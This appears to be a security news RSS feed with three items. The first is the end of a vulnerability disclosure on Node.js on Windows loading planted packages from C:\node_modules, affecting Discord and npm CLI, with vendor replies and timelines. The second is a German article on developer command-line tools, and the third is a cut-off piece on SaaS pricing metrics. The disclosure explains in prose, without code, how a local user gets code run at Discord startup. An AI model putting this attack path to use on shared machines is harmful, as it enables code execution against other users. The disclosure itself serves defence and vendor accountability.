                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2c563913-8390-46a3-aa48-5dcc755c7d4a/Capture.png" data-image-dimensions="1074x528" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2c563913-8390-46a3-aa48-5dcc755c7d4a/Capture.png?format=1000w" width="1074" height="528" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2c563913-8390-46a3-aa48-5dcc755c7d4a/Capture.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2c563913-8390-46a3-aa48-5dcc755c7d4a/Capture.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2c563913-8390-46a3-aa48-5dcc755c7d4a/Capture.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2c563913-8390-46a3-aa48-5dcc755c7d4a/Capture.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2c563913-8390-46a3-aa48-5dcc755c7d4a/Capture.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2c563913-8390-46a3-aa48-5dcc755c7d4a/Capture.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2c563913-8390-46a3-aa48-5dcc755c7d4a/Capture.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
          
          <figcaption data-sqsp-image-classic-block-caption-container class="image-caption-wrapper">
            <p data-rte-preserve-empty="true">Figure 6: Procmon log showing the package resolution behavior of Node.js via CVE-2026-0776</p>
          </figcaption>
        
      
        </figure>
      

    
  


  


<p>The ws library does support disabling this check via the <code>WS_NO_UTF_8_VALIDATE</code> environment variable, but this requires the consuming application (Discord) to set it explicitly. Here’s a quick video demonstrating the bug by popping the calc app when opening Discord:</p>


  














  
    
      
    
    
      
        
          
          
        
      
      
      



    
  








  <p class="">Discord automatically opens on login by default, so in practice code execution happens immediately without any user interaction. Strangely, the Discord Security team made it clear to us in their responses that they do not consider local attack vectors as valid security issues. </p><p class=""><strong>The Bigger Picture</strong></p><p class="">The cases above represent only a few of the applications affected by this pattern. During our investigation we found many other independent reports.  These issues in <a href="https://jira.mongodb.org/browse/COMPASS-9058">Mongo DB Compass</a> and <a href="https://jira.mongodb.org/browse/MONGOSH-2028">Mongo DB Shell</a> are just two other examples.</p><p class="">Every Windows application built on Node.js with missing or optional dependencies is potentially vulnerable. This includes desktop applications that utilize Electron as well as popular web frameworks such as Next.js and React.</p><p class="">Each vendor has clearly stated that they will not treat these issues as vulnerabilities: </p><p class="">NPM’s response to our report: </p><p class=""><em>“exploits that require local access to a machine are considered ineligible for npm CLI</em></p><p class="">Discord’s response to our report:</p><p class=""><em>“We do not consider physical/local attacks as valid security issues”</em></p><p class="">Node.js, in the “Examples of non-vulnerabilities” section of their <a href="https://github.com/nodejs/node/security/policy#examples-of-non-vulnerabilities">Security Policy</a>: </p><p class=""><em>“Node.js trusts the file system in the environment accessible to it. Therefore, it is not a vulnerability if it accesses/loads files from any path that is accessible to it.” </em></p><p class=""><strong>Conclusion</strong></p>





















  
  



<p>The vulnerability pattern described in this blog stems from a deliberate design decision by Node.js maintainers. While Node.js's position that “applications should trust their filesystem” may hold true on properly administered UNIX systems, it creates a systemic vulnerability on Windows where low-privileged users can write to <code>C:\node_modules</code>. Without a fix from Node.js, the burden silently falls on application developers.   </p>
<p>Making matters worse, the vulnerable code may not live in the application code itself. The optional dependencies that trigger this behavior could come from third-party libraries buried in the dependency tree as we saw with both Discord and npm CLI. </p>




  <p class="">We encourage security researchers to further review this issue and investigate other applications for this dangerous behavior. You can find us online at <a href="https://x.com/bobbygould5">@bobbygould5</a> and <a href="https://x.com/izobashi">@izobashi</a>, and follow the team on <a href="https://www.twitter.com/thezdi">Twitter</a>, <a href="https://infosec.exchange/@thezdi">Mastodon</a>, <a href="https://www.linkedin.com/company/zerodayinitiative">LinkedIn</a>, or <a href="https://bsky.app/profile/thezdi.bsky.social">Bluesky</a> for the latest in exploit techniques and security patches.</p><p class=""> </p><p class="">DISCLOSURE TIMELINES</p><p class=""> </p><p class="">NPM CLI: </p><p class="">2024-11-13 – ZDI submitted the report to the vendor</p><p class="">2024-11-13 – The vendor acknowledged the receipt of the report</p><p class="">2024-11-13 – The vendor communicated that the reported behavior was by design and they do not consider local attacks as valid security issues</p><p class="">2025-08-05 – ZDI encouraged the vendor to re-assess the issue</p><p class="">2025-12-18 – ZDI notified the vendor of the intention to publish the case as a 0-day advisory</p><p class=""> </p><p class="">DISCORD: </p><p class="">2025-07-08 – ZDI notified vendor </p><p class="">2025-09-11 – ZDI followed up with vendor </p><p class="">2025-09-15 – Vendor stated they do not consider local attacks as valid security issues </p><p class="">2025-12-01 – ZDI explained why we believe the issue is still valid </p><p class="">2025-12-10 – Vendor replied that the vulnerability is still out of scope  </p><p class="">2025-12-11 – ZDI informed vendor of intent to publish 0-day  </p><p class="">  </p><p class="">REFERENCES</p><p class=""><a href="https://nodejs.org/api/modules.html#loading-from-node_modules-folders">https://nodejs.org/api/modules.html#loading-from-node_modules-folders</a></p><p class=""><a href="https://docs.npmjs.com/cli/v10/configuring-npm/package-json#optionaldependencies">https://docs.npmjs.com/cli/v10/configuring-npm/package-json#optionaldependencies</a></p><p class=""><a href="https://groups.google.com/g/nodejs/c/5BGr5dliUIk/m/abJEH3sPymcJ?pli=1">https://groups.google.com/g/nodejs/c/5BGr5dliUIk/m/abJEH3sPymcJ?pli=1</a></p><p class=""><a href="https://github.com/nodejs/node-v0.x-archive/issues/8830">https://github.com/nodejs/node-v0.x-archive/issues/8830</a></p><p class=""><a href="https://bounty.github.com/ineligible.html#vulnerability_in_upstream_dependencies:~:text=eligible%20for%20rewards.-,Local%20access,-Vulnerabilities%20which%20require">https://bounty.github.com/ineligible.html#vulnerability_in_upstream_dependencies:~:text=eligible%20for%20rewards.-,Local%20access,-Vulnerabilities%20which%20require</a></p><p class=""><a href="https://github.com/nodejs/node/security/policy#examples-of-non-vulnerabilities">https://github.com/nodejs/node/security/policy#examples-of-non-vulnerabilities</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[9 Kommandozeilen-Tools, die jeder Dev braucht]]></title>
<description><![CDATA[Selbst wenn Sie dieser Anblick nicht in Verzückung versetzt – ein Blick auf diese obligatorischen Kommandozeilen-Tools lohnt sich.
					Foto: SkillUp | shutterstock.com




Manche Devs arbeiten mit der Kommandozeile (auch Command Line Interface; CLI), weil sie sie lieben – andere, weil ihnen nich...]]></description>
<link>https://tsecurity.de/de/3694428/it-security-nachrichten/9-kommandozeilen-tools-die-jeder-dev-braucht/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694428/it-security-nachrichten/9-kommandozeilen-tools-die-jeder-dev-braucht/</guid>
<pubDate>Sat, 25 Jul 2026 18:59:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Selbst wenn Sie dieser Anblick nicht in Verzückung versetzt - ein Blick auf diese obligatorischen Kommandozeilen-Tools lohnt sich." title="Selbst wenn Sie dieser Anblick nicht in Verzückung versetzt - ein Blick auf diese obligatorischen Kommandozeilen-Tools lohnt sich." src="https://images.computerwoche.de/bdb/3392868/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Selbst wenn Sie dieser Anblick nicht in Verzückung versetzt – ein Blick auf diese obligatorischen Kommandozeilen-Tools lohnt sich.</p></figcaption></figure><p class="imageCredit">
					Foto: SkillUp | shutterstock.com</p></div>




<p class="wp-block-paragraph">Manche Devs arbeiten mit der Kommandozeile (auch Command Line Interface; CLI), weil sie sie <a href="https://www.computerwoche.de/article/2818958/was-developer-an-ihrem-job-lieben-und-hassen.html" title="lieben" target="_blank">lieben</a> – andere, weil ihnen nichts anderes übrig bleibt. Egal zu welcher Kategorie Sie sich zählen: Diese neun CLI-Tools helfen Ihrer Produktivität und Effizienz (zusätzlich) <a href="https://www.computerwoche.de/article/2816175/so-motivieren-sie-softwareentwickler.html" title="auf die Sprünge" target="_blank">auf die Sprünge</a>.</p>



<h2 class="wp-block-heading"><a href="https://tldr.sh/" target="_blank" rel="noreferrer noopener">tldr</a></h2>



<p class="wp-block-paragraph">Keine Angst, wir ersparen Ihnen an dieser Stelle eine langwierige, faszinative Abhandlung über die ganz eigene Magie, die die Unix-Shell entfaltet. Fakt ist: Wenn man mit ihr arbeiten will, ist es manchmal erforderlich, vorher ein Handbuch zu lesen. Unix Docs (auch man- oder manual pages) sind diesbezüglich allerdings ein zweischneidiges Schwert: Die benötigte Information ist vorhanden – es ist nur die Frage, wo. Den Teil der <a href="https://www.computerwoche.de/article/2791591/so-erstellen-sie-eine-moderne-dokumentation-fuer-anwendungen.html" title="Dokumentation" target="_blank">Dokumentation</a> aufzuspüren, den Sie gerade benötigen, kann ein entmutigender Task sein. Zwar kann die gute alte Befehlszeile dabei helfen – um ein offizielles Handbuch aufzurufen, genügt:</p>



<p class="wp-block-paragraph"><code>$ man </code></p>



<p class="wp-block-paragraph">Allerdings zeichnen sich man-pages vor allem durch ihre Informationsdichte aus – und die Tatsache, dass sie manchmal aktuelle Informationen für neuere Tools vermissen lassen. Das CLI-Tool <code>tldr</code> versetzt Sie in die Lage, zielgerichteter zu suchen:</p>



<p class="wp-block-paragraph"><code>$ tldr </code></p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="tldr in Aktion." title="tldr in Aktion." src="https://images.computerwoche.de/bdb/3392869/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">tldr in Aktion.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph">Falls Sie <code>npm</code> installiert haben, ist die <code>tldr</code>-Installation nur einen kurzen Befehl entfernt:</p>



<p class="wp-block-paragraph"><code>npm install -g tldr</code></p>



<h2 class="wp-block-heading"><a href="https://ngrok.com/download" target="_blank" rel="noreferrer noopener">ngrok</a></h2>



<p class="wp-block-paragraph">Sobald Sie <code>tldr</code> installiert haben, können Sie damit viele weitere Befehle erkunden. Zum Beispiel:</p>



<p class="wp-block-paragraph"><code>$ tldr ngrok</code></p>



<p class="wp-block-paragraph"><code>Reverse proxy that creates a secure tunnel from a public endpoint to a locally running web service.</code></p>



<p class="wp-block-paragraph">Mit <code>ngrok</code> eröffnet sich Ihnen eine stressfreie Möglichkeit, von einem Remote-Browser auf eine Entwicklungsmaschine zuzugreifen. Aber das Tool kann noch weit mehr. Sie können damit beispielsweise in der Cloud entwickeln und die Ergebnisse im Browser in Augenschein nehmen. Zudem können Sie mit <code>ngrok</code> auch schnell und einfach laufende Services über HTTPS veröffentlichen – ohne sich mit der Security-Infrastruktur herumschlagen zu müssen. Angenommen, Sie bauen einen Service Worker auf, der HTTPS benötigt, dann ist alles, was Sie für einen sicheren Kontext tun müssen, <code>ngrok</code> zu starten.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Das CLI-Tool ngrok macht Devs das Leben auf verschiedenen Ebenen leichter." title="Das CLI-Tool ngrok macht Devs das Leben auf verschiedenen Ebenen leichter." src="https://images.computerwoche.de/bdb/3392870/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Das CLI-Tool ngrok macht Devs das Leben auf verschiedenen Ebenen leichter.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph">Ein Beispiel, bei dem der HTTP-Port 8080 freigegeben wird:</p>



<p class="wp-block-paragraph"><code>$ ngrok http 8080</code></p>



<p class="wp-block-paragraph">Der <code>ngrok</code>-Output sieht wie folgt aus:</p>



<p class="wp-block-paragraph"><code>https://f951-34-67-117-59.ngrok-free.app -&gt; <a href="https://localhost:8080/" title="http://localhost:8080" target="_blank" rel="noopener">http://localhost:8080</a></code></p>



<p class="wp-block-paragraph">Anschließend kann jedermann die zugewiesene URL aufrufen (machen Sie sich keine Mühe).</p>



<h2 class="wp-block-heading"><a href="https://www.gnu.org/software/screen/manual/screen.html" target="_blank" rel="noreferrer noopener">screen</a></h2>



<p class="wp-block-paragraph">Mit diesem Befehlszeilen-Tool können Sie eine Shell-Sitzung mit oder ohne laufenden Prozess “beiseite legen” und sie anschließend zu einem beliebigen Zeitpunkt fortsetzen – auch wenn Sie die ursprüngliche Session beenden.</p>



<p class="wp-block-paragraph"><code>$ tldr screen</code></p>



<p class="wp-block-paragraph"><code>Hold a session open on a remote server. Manage multiple windows with a single SSH connection.</code></p>



<p class="wp-block-paragraph">Nehmen wir an, Sie starten <code>ngrok</code>, um remote auf eine <a href="https://www.computerwoche.de/article/2805798/7-webseiten-die-ihre-desktop-software-ersetzen.html" title="Webanwendung" target="_blank">Webanwendung</a> zuzugreifen: Sie starten den Prozess, lassen diesen dann in <code>screen</code> laufen und programmieren so lange etwas. Währenddessen läuft <code>ngrok</code> die ganze Zeit weiter – Sie können über <code>screen</code> jederzeit wieder darauf zugreifen. Veranschaulicht in Code würde das wie folgt aussehen:</p>



<p class="wp-block-paragraph"><code>$ screen</code></p>



<p class="wp-block-paragraph"><code>// Now we are in a new session</code></p>



<p class="wp-block-paragraph"><code>$ ngrok http 8080</code></p>



<p class="wp-block-paragraph"><code>// Now ngrok is running, exposing http port 8080</code></p>



<p class="wp-block-paragraph"><code>Type ctrl-a</code></p>



<p class="wp-block-paragraph"><code>// Now we are in screen's command mode</code></p>



<p class="wp-block-paragraph"><code>Type the "d" key, to "detach".</code></p>



<p class="wp-block-paragraph"><code>// Now you are back in the shell that you started in, while screen is running your ngrok command in the background:</code></p>



<p class="wp-block-paragraph"><code>$ screen -list</code></p>



<p class="wp-block-paragraph"><code>There is a screen on:</code></p>



<p class="wp-block-paragraph"><code> 128861.pts-0.dev3 (04/25/24 14:36:58) (Detached)</code></p>



<p class="wp-block-paragraph"><strong>Tipp</strong></p>



<p class="wp-block-paragraph"> Wenn Sie eine laufende Sitzung, in der Sie sich gerade befinden, benennen wollen, nutzen Sie die Tastenkombination Strg + A und geben <code>:sessionname </code> ein. Das ist besonders nützlich, wenn Sie mit mehreren Screen-Instanzen arbeiten wollen.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Screen ist ein umfangreiches und potentes CLI-Tool." title="Screen ist ein umfangreiches und potentes CLI-Tool." src="https://images.computerwoche.de/bdb/3392871/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Screen ist ein umfangreiches und potentes CLI-Tool.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph">Wenn wie im Beispiel nur eine <code>screen</code>-Instanz läuft, führt der Befehl <code>$ screen -r</code> (für “re-attach”) Sie zurück zu Ihrer <code>ngrok</code>-Sitzung. Im Fall mehrerer Screens können Sie diese mit Hilfe ihrer ID wieder aufrufen:</p>



<p class="wp-block-paragraph"><code>$ screen -r </code></p>



<p class="wp-block-paragraph">Wenn Sie Ihre Session endgültig beenden wollen, beenden Sie ngrok mit Strg + C und geben anschließend <code>exit</code> in die Kommandozeile ein.</p>



<h2 class="wp-block-heading"><a href="https://sdkman.io/" target="_blank" rel="noreferrer noopener">sdkman</a> &amp; <a href="https://github.com/nvm-sh/nvm" target="_blank" rel="noreferrer noopener">nvm</a></h2>



<p class="wp-block-paragraph">Wenn Sie <a href="https://www.computerwoche.de/article/2831436/darum-bleibt-java-relevant.html" title="Java" target="_blank">Java</a> oder <a href="https://www.computerwoche.de/article/2794625/was-javascript-von-typescript-unterscheidet.html" title="JavaScript" target="_blank">JavaScript</a> auf einem Server verwenden, sollten Sie sich mit <code>sdkman</code> (für Java) und <code>nvm</code> (für Node) vertraut machen. Beide Kommandozeilen-Tools sind nützlich, wenn es darum geht, mit mehreren Programmiersprachenversionen auf dem selben Rechner zu jonglieren – und dabei sowohl Path Adjustment als auch Umgebungsvariablen überflüssig machen. </p>



<p class="wp-block-paragraph">Mit <code>sdkman</code> können Sie beispielsweise neuere Java-Versionen erkunden und anschließend wieder zum aktuellen LTS-Release springen. Dieser Prozess wird durch das <code>sdk</code>-Kommando abstrahiert.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="sdkman zeigt alle verfügbaren Java-Installationen auf einem lokalen Rechner an - inklusive derjenigen, die gerade in Benutzung ist." title="sdkman zeigt alle verfügbaren Java-Installationen auf einem lokalen Rechner an - inklusive derjenigen, die gerade in Benutzung ist." src="https://images.computerwoche.de/bdb/3392872/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">sdkman zeigt alle verfügbaren Java-Installationen auf einem lokalen Rechner an – inklusive derjenigen, die gerade in Benutzung ist.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph">Zwischen den Versionen zu wechseln, gestaltet sich denkbar einfach – <code>$ sdk use java 19-open</code> führt Sie direkt zu JDK Version 19.</p>



<p class="wp-block-paragraph"><code>$ tldr sdk</code></p>



<p class="wp-block-paragraph"><code>Manage parallel versions of multiple Software Development Kits.</code></p>



<p class="wp-block-paragraph"><code>Supports Java, Groovy, Scala, Kotlin, Gradle, Maven, Vert.x and many others.</code></p>



<p class="wp-block-paragraph">Die <code>nvm</code>-Utility funktioniert ganz ähnlich:</p>



<p class="wp-block-paragraph"><code>$ tldr nvm</code></p>



<p class="wp-block-paragraph"><code>Install, uninstall or switch between Node.js versions.</code></p>



<p class="wp-block-paragraph"><code>Supports version numbers like "12.8" or "v16.13.1", and labels like "stable", "system", etc.</code></p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Ein Blick auf nvm." title="Ein Blick auf nvm." src="https://images.computerwoche.de/bdb/3392873/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Ein Blick auf nvm.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<h2 class="wp-block-heading"><a href="https://github.com/junegunn/fzf" target="_blank" rel="noreferrer noopener">fzf</a></h2>



<p class="wp-block-paragraph">Sowohl <code>grep</code> als auch <code>find</code> sind Standardbestandteile der Kommandozeilen-Befehlspalette. Allerdings sind beide Tools nicht so funktional, wie sie sein sollten. Das ruft <code>fzf</code> auf den Plan – einen “Fuzzy File Finder”. Mit “Fuzzy” ist dabei gemeint, dass die Details zu dem, was Sie suchen, nicht unbedingt klar definiert sein müssen. Ein Beispiel:</p>



<p class="wp-block-paragraph"><code>$ tldr fzf</code></p>



<p class="wp-block-paragraph"><code>Command-line fuzzy finder.</code></p>



<p class="wp-block-paragraph"><code>Similar to sk.</code></p>



<p class="wp-block-paragraph">Sobald Sie <code>fzf</code> starten, indiziert das CLI-Tool umgehend das Dateisystem, um Ergebnisvorschläge für Ihre Suchen zu unterbreiten.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="In diesem Beispiel suchen wir nach einem Projekt, an dem wir zuletzt gearbeitet haben." title="In diesem Beispiel suchen wir nach einem Projekt, an dem wir zuletzt gearbeitet haben." src="https://images.computerwoche.de/bdb/3392874/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">In diesem Beispiel suchen wir nach einem Projekt, an dem wir zuletzt gearbeitet haben.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph">Aus 878.937 Möglichkeiten hat <code>fzf</code> die 25 Dateien und Verzeichnisse ausgewählt, die unseren Anforderungen entsprechen könnten – und das völlig ohne Umwege.</p>



<h2 class="wp-block-heading"><a href="https://github.com/ogham/exa" target="_blank" rel="noreferrer noopener">exa</a></h2>



<p class="wp-block-paragraph">Mit <code>exa</code> werden langweilige alte <code>ls</code>-Listings schöner und nützlicher:</p>



<p class="wp-block-paragraph"><code>$ tldr</code></p>



<p class="wp-block-paragraph"><code>A modern replacement for ls (List directory contents).</code></p>



<p class="wp-block-paragraph">Für eine <a href="https://www.computerwoche.de/article/2834060/10-wege-zur-besseren-developer-experience.html" title="bessere Developer Experience" target="_blank">bessere Developer Experience</a> ohne mentalen Overhead statten Sie <code>ls</code> einfach mit einem <code>exa</code>-Alias aus. Das Tool respektiert die meisten <code>ls</code>-Standardoptionen – <code>exa -l</code> funktioniert also (beispielsweise) genau so, wie Sie es erwarten würden.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Exa ist das neue ls." title="Exa ist das neue ls." src="https://images.computerwoche.de/bdb/3392875/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Exa ist das neue ls.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<h2 class="wp-block-heading"><a href="https://github.com/sharkdp/bat" target="_blank" rel="noreferrer noopener">bat</a></h2>



<p class="wp-block-paragraph">Die <code>bat</code>-Utility ähnelt dem <code>cat</code>-Tool – ist aber besser:</p>



<p class="wp-block-paragraph"><code>$ tldr bat</code></p>



<p class="wp-block-paragraph"><code>Print and concatenate files.</code></p>



<p class="wp-block-paragraph"><code>A cat clone with syntax highlighting and Git integration.</code></p>



<p class="wp-block-paragraph">Es handelt sich hierbei im Wesentlichen um eine Komfort- beziehungsweise <a href="https://www.computerwoche.de/article/2821891/8-wege-um-top-entwickler-zu-halten.html" title="Developer-Experience-Optimierung" target="_blank">Developer-Experience-Optimierung</a> – ähnlich wie im Fall von <code>exa</code>. Wenn Sie <code>bat</code> verwenden, erwartet Sie ein vollwertiger File Viewer – inklusive Title, Borders, Line Numbers und insbesondere einer hilfreichen Syntax-Highlighting-Funktion für Programmiersprachen oder Konfigurationsdateien. Dabei reagiert <code>bat</code> auf less/more-Befehle – und wird mit “<code>q</code>” beendet. Die Navigation erfolgt über die Pfeiltasten.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Bat ist ein simples Dienstprogramm, das es zu einem echten Erlebnis macht, Dateien auf der Konsole zu durchsuchen." title="Bat ist ein simples Dienstprogramm, das es zu einem echten Erlebnis macht, Dateien auf der Konsole zu durchsuchen." src="https://images.computerwoche.de/bdb/3392876/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Bat ist ein simples Dienstprogramm, das es zu einem echten Erlebnis macht, Dateien auf der Konsole zu durchsuchen.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<h2 class="wp-block-heading"><a href="https://github.com/NetHack/NetHack" target="_blank" rel="noreferrer noopener">nethack</a></h2>



<p class="wp-block-paragraph">Ein absoluter Kommandozeilen-Klassiker ist <code>nethack</code> – der ursprüngliche, Konsolen-basierte ASCII <a href="https://de.wikipedia.org/wiki/NetHack" title="Dungeon Crawler" target="_blank" rel="noopener">Dungeon Crawler</a>. Das CLI-Tool wird Ihre Produktivität zwar nicht direkt ankurbeln – kann aber durchaus dabei helfen, ein paar Minuten zur Ruhe zu kommen, um komplexe Dev-Probleme zu durchdringen.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Es gibt neuere Versionen des Nethack-Konzepts - manchmal fährt man jedoch mit dem Original am besten." title="Es gibt neuere Versionen des Nethack-Konzepts - manchmal fährt man jedoch mit dem Original am besten." src="https://images.computerwoche.de/bdb/3392877/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Es gibt neuere Versionen des Nethack-Konzepts – manchmal fährt man jedoch mit dem Original am besten.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph"><strong>Dieser Artikel ist <a href="https://www.infoworld.com/article/2337138/9-command-line-jewels-for-your-developer-toolkit.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Infoworld.com erschienen.<br></strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The new value architecture of the AI-native SaaS era]]></title>
<description><![CDATA[The traditional methods of measuring success no longer tell the full story. Here’s what should replace them — and why.



In brief:




AI is transforming software as a service (SaaS), and the old ways of keeping score no longer apply.



Smart companies are evolving new metrics that provide deep...]]></description>
<link>https://tsecurity.de/de/3694395/it-security-nachrichten/the-new-value-architecture-of-the-ai-native-saas-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694395/it-security-nachrichten/the-new-value-architecture-of-the-ai-native-saas-era/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The traditional methods of measuring success no longer tell the full story. Here’s what should replace them — and why.</p>



<p class="wp-block-paragraph">In brief:</p>



<ul class="wp-block-list">
<li><a href="https://www.cio.com/article/4146669/is-ai-the-end-of-saas-as-we-know-it.html">AI is transforming software as a service (SaaS)</a>, and the old ways of keeping score no longer apply.</li>



<li>Smart companies are evolving new metrics that provide deeper insight into how AI-native software is performing in a new marketplace.</li>



<li>These changes impact everything from pricing to valuations.</li>
</ul>



<p class="wp-block-paragraph">The transformation of the software-as-a-service (SaaS) industry toward AI-native operating companies is rapidly changing the unit of value across the industry.</p>



<p class="wp-block-paragraph">The traditional metric of seats — which measured access — is rapidly giving way to credits designed to measure work performed. This evolution is upending the industry in multiple ways, impacting everything from pricing to enterprise valuations.</p>



<p class="wp-block-paragraph">While many companies still cling to seat-based metrics to measure growth, efficiency and durability, the future is likely to be one in which companies utilize a <a href="https://www.cio.com/article/4184688/it-hurtles-toward-the-great-enterprise-pricing-reset.html">credit-centric metrics framework</a>, with seats and outcomes as the bookends of a spectrum.</p>



<h2 class="wp-block-heading">Why do software companies need new metrics?</h2>



<p class="wp-block-paragraph">Why the rethink, and why now? There are five major forces that are driving this shift:</p>



<ol start="1" class="wp-block-list">
<li><a href="https://www.idc.com/resource-center/blog/is-saas-dead-rethinking-the-future-of-software-in-the-age-of-ai/"><strong>The unit of value is changing</strong></a><strong>.</strong> Seats measured who could access software, and credits measure what the software actually does. But in an AI-native world, agents don’t have seats; they have workloads. Over the past 18 months, every major SaaS platform has moved to some forms of credit or consumption unit.</li>



<li><strong>The cost of goods sold (COGS) is exploding.</strong> AI inference adds real per-unit costs that scale with usage. In an AI-native world, software companies can’t scale to infinite users at near‑zero marginal cost as before.</li>



<li><strong>Buying is moving up the org chart.</strong> AI-native applications shift purchasing to higher-level operators — such as line-of-business leaders or chief operating officers — which expands the market from software budgets to labor budgets. And because AI agents replace services as well as software, the total market opportunity is 3x to 10x larger than traditional SaaS.</li>



<li><strong>Time to value (TTV) is collapsing.</strong> With AI-native tools, customers start seeing meaningful results in weeks rather than quarters. Onboarding and setup are fast, workflows are pre-built, and there’s no need for extensive customer success or professional services — dramatically reducing implementation time and costs.</li>



<li><strong>Retention is bifurcating.</strong> AI forces clarity in a way that traditional SaaS couldn’t. Products that can provide value become even “stickier” and retain customers. Those that don’t churn faster. In an AI-native marketplace, the middle disappears.</li>
</ol>



<h2 class="wp-block-heading">How this shift is impacting pricing</h2>



<p class="wp-block-paragraph"><a href="https://www.ey.com/en_us/insights/strategy/grow-with-trusted-software-portfolio-management">Given how AI-native software is transforming the market</a>, the shift to more variable pricing options is inevitable.</p>



<p class="wp-block-paragraph">Seats won’t go away completely. Subscription pricing based on the number of users is stable and predictable and will continue to work for some customers. Tokens — the use of pass-through pricing for underlying compute — will fit those customers where the AI feature is commoditized or the buyer wants transparency into costs.</p>



<p class="wp-block-paragraph">Credits will likely become the dominant architecture because they provide a simple metric for both customers and providers. The vendor sets the conversation ratio between credits and underlying compute, shielding the customer from inference cost details. Credits are easy to understand and can be packaged into annual contracts for multiple features and products.</p>



<p class="wp-block-paragraph">Finally, the industry will likely see <a href="https://www.gartner.com/en/newsroom/press-releases/2026-07-01-gartner-says-us-dollars-234-billion-in-enterprise-application-software-spend-is-at-risk-from-agentic-artificial-intelligence">some move toward outcome-based pricing</a> for results such as resolved tickets, recovered revenue or qualified leads. This strategy will mostly be limited to verticals where it is easy to prove AI impacted the result.</p>



<p class="wp-block-paragraph">Where a software vendor sits on this spectrum is a signal of differentiation and pricing power. Credits are where most defensible AI-native businesses are landing because they balance customer predictability with vendor margin control.</p>



<h2 class="wp-block-heading">How AI upends classic SaaS metrics</h2>



